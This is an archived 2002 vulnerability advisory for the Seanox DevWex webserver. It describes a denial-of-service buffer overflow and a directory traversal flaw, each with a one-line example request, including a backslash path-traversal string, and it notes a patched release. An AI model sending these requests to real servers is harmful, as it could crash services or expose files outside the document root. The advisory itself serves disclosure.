Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: web5449.htm

DevWex Denial of Service and Directory traversal
14th Jun 2002 [SBWID-5449]

	DevWex Denial of Service and Directory traversal


	Seanox DevWex 1.2002.0520 Windows binary


	Ueli Kistler [] found following:

	DevWex is a small and flexible Webserver  running  as  standalone  win32
	binary and as JAVA application.


	 Buffer-overflow problem



	It exists a buffer-overflow problem in  the  procedure  handling  a  GET
	command. Sending at least 258383  caracters  with  a  GET  command  will
	crash the server and make it inaccessible. This could perhaps  allow  an
	attacker to execute shellcode.


	Example: GET 258383xA+CRLF+CRLF




	 Directory traversal



	An attacker can request an URL containing  Windows  path  delimiters  to
	break out of the document root of DevWex. This  allows  an  attacker  to
	download sensitive data.


	Example: GET /..\\..\\..\\..\\anyfile



	Seanox has released a new version (1.2002.0601)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH